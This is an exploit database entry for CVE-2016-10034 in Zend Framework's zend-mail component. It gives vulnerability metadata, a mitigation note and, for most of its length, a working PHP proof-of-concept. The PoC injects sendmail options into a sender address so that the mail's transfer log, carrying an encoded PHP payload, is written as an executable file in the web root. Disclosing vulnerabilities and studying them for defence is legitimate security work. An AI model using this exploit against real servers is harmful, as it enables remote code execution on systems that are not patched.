Remote Code Execution in Zend Framework

vendor:

Zend Framework

by:

Dawid Golunski

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Zend Framework

Affected Version From: Zend Framework < 2.4.11, zend-mail < 2.4.11

Affected Version To: Zend Framework < 2.4.11, zend-mail < 2.7.2

Patch Exists: YES

Related CWE: CVE-2016-10034

CPE:

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2016-10034/

Other Scripts:

Platforms Tested:

2016

Remote Code Execution in Zend Framework

The vulnerability allows an attacker to inject arbitrary parameters into the sendmail command, leading to remote code execution. The exploit takes advantage of a vulnerability in zend-mail component of Zend Framework versions below 2.4.11 and below 2.7.2. By injecting specific parameters, the attacker can write the transfer log into a file and execute arbitrary code.

Mitigation:

Update Zend Framework to version 2.4.11 or above, or version 2.7.2 or above for zend-mail component. Ensure that the web user does not have write permissions to the cache directory.

Source

Exploit-DB raw data:

<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);

?>